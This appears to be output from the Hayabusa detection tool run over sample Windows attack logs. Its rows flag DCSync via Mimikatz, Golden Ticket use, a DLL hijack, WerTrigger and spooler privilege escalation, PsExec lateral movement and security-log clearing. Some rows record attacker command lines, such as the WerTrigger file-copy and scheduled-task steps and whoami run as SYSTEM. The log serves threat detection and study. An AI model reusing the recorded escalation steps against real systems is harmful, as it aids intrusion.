Mimikatz.evtx -2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55733 : LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 58736 : LogonID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$ : Workstation: - : IP Address: 10.23.42.18 : Port: 62274 : LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55738 : LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55748 : LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54927 : LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54931 : LogonID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54933 : LogonID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54932 : LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55750 : LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx -2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""c:\windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx -2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat""""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: WerTrigger.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wermgr.exe -upload",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx -2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: hack-admu-test1 : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: JUMP01$ : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx -2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: not_existing_user : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx -2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx -2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: not_existing_user : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b90e2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9a72,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119b9a8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119b9aa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119b9ab2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50317 : LogonID: 0x119b9b27,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50329 : LogonID: 0x119b9e04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50380 : LogonID: 0x119ba401,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50381 : LogonID: 0x119ba414,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 50382 : LogonID: 0x119ba427,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx -2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,informational,Process Creation,Command: C:\WINDOWS\PSEXESVC.exe : Path: C:\Windows\PSEXESVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\WINDOWS\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Service Start,,rules/sigma/process_creation/win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,PsExec Tool Execution,,rules/sigma/process_creation/process_creation_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx -2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: 04246W-WIN10 : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60728 : LogonID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,informational,Logon Type 3 - Network,User: a-jbrown : Workstation: - : IP Address: 172.16.66.142 : Port: 60726 : LogonID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx -2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 